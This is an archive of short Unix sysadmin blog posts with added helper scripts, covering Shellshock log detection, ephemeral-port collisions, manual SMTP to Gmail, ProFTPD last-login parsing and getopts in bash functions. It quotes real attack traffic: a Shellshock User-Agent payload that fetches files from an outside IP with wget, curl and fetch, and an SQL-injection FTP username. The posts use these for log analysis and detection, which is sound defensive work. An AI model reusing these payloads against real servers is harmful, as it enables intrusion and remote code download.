Recently in Unix Category

Proving one is Elite


You know you're skilled as a hacker when you're so fast, you don't even need to configure your scanning scripts:

106.51.29.122 - - [01/Aug/2016:13:49:38 -0400] ***.******.*** "GET HTTP/1.1 HTTP/1.1" 400 340 "-" "() 
{ :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://185.125.4.222/YOUR_URL_HERE ;
curl -O http://185.125.4.222/YOUR_URL_HERE ; fetch http://185.125.4.222/YOUR_URL_HERE\");'"

They're trying to use the Shellshock vulnerability, I think.
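The useful thing about an entry like that is the log line itself, so here is an added example (my code, not from the post) that pulls Shellshock probes out of an Apache access log. The trigger is a bash function definition `() {` smuggled in as a header value, here the User-Agent; a patched bash ignores it, and what you want from the log is which client sent it and when. The sample lines are constructed, not the post's real log.

```sh
#!/bin/sh
# Added example (not from the post): flag Shellshock probes in an Apache
# access log. The trigger is "() {" at the start of a header value, which an
# unpatched bash would parse out of the environment as a function definition.

# Constructed sample lines in combined log format (not the post's real log).
write_sample_access_log() {
  f=$(mktemp "${TMPDIR:-/tmp}/access-sample.XXXXXX")
  cat >"$f" <<'EOF'
203.0.113.9 - - [01/Aug/2016:13:49:38 -0400] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Aug/2016:13:50:01 -0400] "GET HTTP/1.1 HTTP/1.1" 400 340 "-" "() { :;}; echo XSUCCESS"
203.0.113.9 - - [01/Aug/2016:13:51:12 -0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "curl/7.47.0"
EOF
  printf '%s\n' "$f"
}

# Regex for the trigger: "()" then optional whitespace then "{". The whole
# line is searched rather than just the User-Agent field, because the same
# payload can arrive in any header the server copies into the environment
# (Referer, Cookie, ...).
SHELLSHOCK_RE='[(][)][[:space:]]*[{]'

# stdin: access log lines; stdout: "client-ip [timestamp]" for each probe.
flag_shellshock_probes() {
  grep -E "$SHELLSHOCK_RE" | awk '{ print $1, $4 " " $5 }'
}

# Number of probes in a log file, e.g. for an alerting threshold.
count_shellshock_probes() {
  grep -Ec "$SHELLSHOCK_RE" "$1" || true   # grep exits 1 on zero matches
}
```

Run it against a real log with `flag_shellshock_probes < /var/log/apache2/access.log`; the source IPs it prints are what you feed into a blocklist or a ticket, and a non-zero count on a host with CGI enabled is worth checking the bash version on.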

Stupid Linux Tricks

tcp        0      0 XX.XX.XX.XX:44101         XX.XX.XX.XX:1521          ESTABLISHED 

That is Java's Oracle driver choosing a source port at random, which is what it does all the time. Only this time the port it chose is the one Java's RMI uses, so a different app was unable to start up: it failed when trying to bind to port 44101. Of course Oracle connections come and go, so with no user action the problem went away in about 10 minutes.

A
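The general problem is a fixed listening port that sits inside the kernel's ephemeral (outbound source) port range, so any outgoing connection can grab it first. As an added example (my code, not from the post), here is a check for that on Linux, which keeps the range in /proc; the fallback range values are an assumption for hosts where that file cannot be read.

```sh
#!/bin/sh
# Added example (not from the post): does a fixed listening port, like the
# 44101 the RMI service wanted, lie inside the kernel's ephemeral port range?
# If so, any client connection (here the Oracle JDBC driver) can take it
# first and the listener fails to bind.

# Linux exposes the range as "low<TAB>high"; the fallback is an assumption
# for non-Linux hosts or restricted containers.
ephemeral_range() {
  cat /proc/sys/net/ipv4/ip_local_port_range 2>/dev/null || echo "32768 60999"
}

# port low high -> exit 0 when low <= port <= high
port_in_range() {
  [ "$1" -ge "$2" ] && [ "$1" -le "$3" ]
}

# check_listen_port PORT [LOW HIGH]: verdict on stdout, exit 1 on a collision.
# The fix on Linux is to exclude the port from ephemeral allocation with the
# net.ipv4.ip_local_reserved_ports sysctl (comma-separated list of ports).
check_listen_port() {
  port=$1
  if [ $# -ge 3 ]; then
    low=$2; high=$3
  else
    set -- $(ephemeral_range)
    low=$1; high=$2
  fi
  if port_in_range "$port" "$low" "$high"; then
    echo "port $port is inside the ephemeral range $low-$high;"
    echo "reserve it: sysctl -w net.ipv4.ip_local_reserved_ports=$port"
    return 1
  fi
  echo "port $port is outside the ephemeral range $low-$high"
}
```

`check_listen_port 44101` with no range arguments reads the live kernel setting; reserving the port is the durable fix, since waiting ten minutes for the Oracle session to close is not a strategy.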

Manual SMTP to GMail


Google has started requiring incoming mail to comply with more of RFC 2822, particularly with respect to headers; to wit, they won't accept incoming mail without a "From:" header. If you try to send without one, you'll get a rejection like this:

this message is not RFC 2822 compliant. To reduce the amount of spam
5.7.1 sent to Gmail, this message has been blocked. Please review
5.7.1 RFC 2822 specifications for more information. iw4si27447595pac.153 - gsmtp

This isn't an issue when you use a mail client, but if you're manually entering SMTP commands it adds an extra requirement. The following is a conforming session, or at least conforming enough -- the RFC requires a Date header as well, but Google isn't enforcing that.

$ telnet smtp-server 25
220 SMTP_SERVER Microsoft ESMTP MAIL Service ready at Thu, 27 Jun 2013 22:45:15 -0400
helo
250 SMTP_SERVER Hello [10.103.13.44]
mail from: my_address@domain
250 2.1.0 Sender OK
rcpt to: target_address@domain.gmail.com
250 2.1.5 Recipient OK
data
354 Start mail input; end with <CRLF>.<CRLF>
From: ME
Subject: testing SMTP

this is a test

(props to)
A
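As an added example (my code, not from the post), this builds the text that goes after the DATA command in the session above, with both the From: header Gmail insists on and the Date: header the RFC requires, using CRLF line ends as SMTP expects. The check function refuses a message that lacks either header before you paste it in; the terminating "." line is still typed into the session separately.

```sh
#!/bin/sh
# Added example (not from the post): compose the DATA payload for a manual
# SMTP session with the headers Gmail checks, and verify a message has them.

# compose_message FROM TO SUBJECT BODY -> message text on stdout.
# Headers, a blank line, then the body; every line ends in CRLF.
compose_message() {
  date_hdr=$(date '+%a, %d %b %Y %H:%M:%S %z')   # RFC 2822 date-time form
  printf 'From: %s\r\nTo: %s\r\nDate: %s\r\nSubject: %s\r\n\r\n%s\r\n' \
    "$1" "$2" "$date_hdr" "$3" "$4"
}

# stdin: a message; exit 0 only if the header block (everything before the
# first blank line) contains both From: and Date:.
has_required_headers() {
  hdr=$(tr -d '\r' | awk 'NF == 0 { exit } { print }')
  printf '%s\n' "$hdr" | grep -qi '^From:' &&
    printf '%s\n' "$hdr" | grep -qi '^Date:'
}
```

Usage: `compose_message me@example.com you@gmail.com "testing SMTP" "this is a test"` prints the block to paste after the `354` prompt; piping a message through `has_required_headers` first catches the case that produces the 5.7.1 rejection above.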

Neat little MySQL trick:

mysql> \P grep -v Sleep
PAGER set to 'grep -v Sleep'

filters out the idle connections from the output of 'show processlist'

A

Fun with FTP Logs


Had to do some work with ProFTPD logs today. This script was created to get the date of last login of a user, or of a list of users, and return that data as a .csv file. If you have customized the log formats, you may need to tweak the regex that breaks apart the line.

get_last_login.pl

Several bits are incomplete, including the proper handling of timezone offsets and the usage text in the help routine, but it works if you pass it a logfile and either a name or a namefile:

$ get_last_login.pl --log=auth.log --namefile=username_list.txt > last_login.csv

or

$ get_last_login.pl --log=auth.log --name=am_user > last_login.csv

In doing this work, I noticed something fun: people are now trying SQL injection through FTP:

ProFTPD Default Installation [32717] ###.###.###.### [24/Feb/2013:00:16:23 -0500] "USER %') 
UNION SELECT 1,concat(0x7b,0x6d,0x64,0x35,0x7d,0x78,0x4d,0x70,0x43,0x4f,0x4b,0x43,0x35,0x49,0x34,0x49,0x4e,
0x7a,0x46,0x43,0x61,0x62,0x33,0x57,0x45,0x6d,0x77,0x3d,0x3d),NULL,NULL,concat(0x2f),concat(0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68) #" 331

A
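Here is an added example (my code, not the post's get_last_login.pl) that does the last-login-to-CSV job for a log in the layout shown above, and that survives a line like the injection attempt: the command is taken as everything between the first and the last double quote, so a username containing spaces, quotes or SQL does not break the split. It assumes that a "USER name" line followed by a "PASS (hidden)" line with status 230 from the same [pid] is one successful login, that lines are in time order (so the last one seen wins), and it keeps the timezone offset as text rather than normalising it. The log lines are constructed sample data.

```sh
#!/bin/sh
# Added example (not the post's script): last successful login per user from
# a ProFTPD log in the layout shown in the post, printed as CSV.

# Constructed sample log, not real data. pid 32717 is the injection probe
# (login fails, 530); alice logs in twice; bob never gets past PASS.
write_sample_ftp_log() {
  f=$(mktemp "${TMPDIR:-/tmp}/proftpd-sample.XXXXXX")
  cat >"$f" <<'EOF'
ProFTPD Default Installation [32717] 192.0.2.10 [24/Feb/2013:00:16:23 -0500] "USER %') UNION SELECT 1,NULL #" 331
ProFTPD Default Installation [32717] 192.0.2.10 [24/Feb/2013:00:16:24 -0500] "PASS (hidden)" 530
ProFTPD Default Installation [32801] 198.51.100.7 [24/Feb/2013:08:30:00 -0500] "USER alice" 331
ProFTPD Default Installation [32801] 198.51.100.7 [24/Feb/2013:08:30:01 -0500] "PASS (hidden)" 230
ProFTPD Default Installation [32950] 198.51.100.7 [25/Feb/2013:09:01:01 -0500] "USER alice" 331
ProFTPD Default Installation [32950] 198.51.100.7 [25/Feb/2013:09:01:02 -0500] "PASS (hidden)" 230
ProFTPD Default Installation [33002] 203.0.113.5 [25/Feb/2013:11:00:00 -0500] "USER bob" 331
ProFTPD Default Installation [33002] 203.0.113.5 [25/Feb/2013:11:00:01 -0500] "PASS (hidden)" 530
EOF
  printf '%s\n' "$f"
}

# proftpd_last_login LOGFILE USER... -> one "user,last_login" line per user,
# with an empty timestamp for a user who never logged in successfully.
# Assumption: a USER line and a later "PASS (hidden)" 230 from the same pid
# are one successful login; the log is in time order.
proftpd_last_login() {
  log=$1; shift
  awk -v names="$*" '
    {
      # first [..] is the session pid, second [..] is the timestamp
      p = index($0, "["); q = index($0, "]")
      pid = substr($0, p + 1, q - p - 1)
      rest = substr($0, q + 1)
      p = index(rest, "["); q = index(rest, "]")
      ts = substr(rest, p + 1, q - p - 1)
      # command = text between the first and the last double quote, so odd
      # usernames do not break the split; the status code follows the quote
      first = index($0, "\"")
      last = 0; s = $0
      while ((i = index(s, "\"")) > 0) { last += i; s = substr(s, i + 1) }
      cmd = substr($0, first + 1, last - first - 1)
      status = substr($0, last + 2); sub(/ .*/, "", status)
      if (cmd ~ /^USER /) user[pid] = substr(cmd, 6)
      else if (cmd == "PASS (hidden)" && status == "230" && (pid in user))
        seen[user[pid]] = ts
    }
    END {
      n = split(names, want, " ")
      for (k = 1; k <= n; k++)
        print want[k] "," ((want[k] in seen) ? seen[want[k]] : "")
    }' "$log"
}
```

Usage mirrors the post's script: `proftpd_last_login auth.log am_user > last_login.csv`, or `proftpd_last_login auth.log $(cat username_list.txt)` for a namefile (usernames without spaces, which is the only case that join handles).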

Helpful hint: if you have a bash script with a function that calls getopts, like this:

make_tarball() {
    local START=`get_start_time`
    ## declare some variables
    # ...
    local OPTARG OPTIND
    ## Parse the args
    while getopts "s:d:a:x:X:v" ARG
    do
        case $ARG in
            s) SOURCE_PATH="$SOURCE_PATH $OPTARG"
                ;;
            # ...
        esac
    done
    # ...
}

you MUST make OPTIND a local variable, or a second (third, etc.) call to the function will fail, with OPTIND too large to see any of the arguments.

blegh
A
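The same pattern with the fix applied, as an added example (my code, not the post's make_tarball): getopts keeps its position in OPTIND, so a function that does not localise it leaves OPTIND pointing past the end of the first call's arguments and the next call sees no options. Declaring it local *and* initialising it to 1 resets getopts in both bash and dash, which is the form I'd use. The buggy twin is kept only to show the failure.

```sh
#!/bin/sh
# Added example (not the post's script): getopts inside a function, with
# OPTIND made local so repeated calls each parse their own arguments.

# parse_opts [-s PATH]... [-v] OPERAND... -> one summary line on stdout
parse_opts() {
  local OPTIND=1 OPTARG ARG        # the fix: fresh getopts state per call
  local src="" verbose=0
  while getopts "s:v" ARG; do
    case $ARG in
      s) src="${src:+$src }$OPTARG" ;;
      v) verbose=1 ;;
      *) return 2 ;;                 # getopts has already printed the error
    esac
  done
  shift $((OPTIND - 1))              # drop the options, keep the operands
  printf 'src=%s verbose=%d rest=%s\n' "$src" "$verbose" "$*"
}

# Same logic without the fix, kept to show the failure the post describes:
# called twice in the same shell, the second call inherits the first call's
# OPTIND and finds no options.
parse_opts_buggy() {
  local src="" verbose=0
  while getopts "s:v" ARG; do
    case $ARG in
      s) src="${src:+$src }$OPTARG" ;;
      v) verbose=1 ;;
      *) return 2 ;;
    esac
  done
  shift $((OPTIND - 1))
  printf 'src=%s verbose=%d rest=%s\n' "$src" "$verbose" "$*"
}

# Run both twice to see the difference (call demo from an interactive shell).
demo() {
  parse_opts -s /etc -v a b;       parse_opts -s /var x
  parse_opts_buggy -s /etc -v a b; parse_opts_buggy -s /var x
}
```

The first pair prints `src=/etc verbose=1 rest=a b` then `src=/var verbose=0 rest=x`; the buggy pair gets the first line right and then, exactly as the post says, loses the second call's options.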

About this Archive

This page is an archive of recent entries in the Unix category.
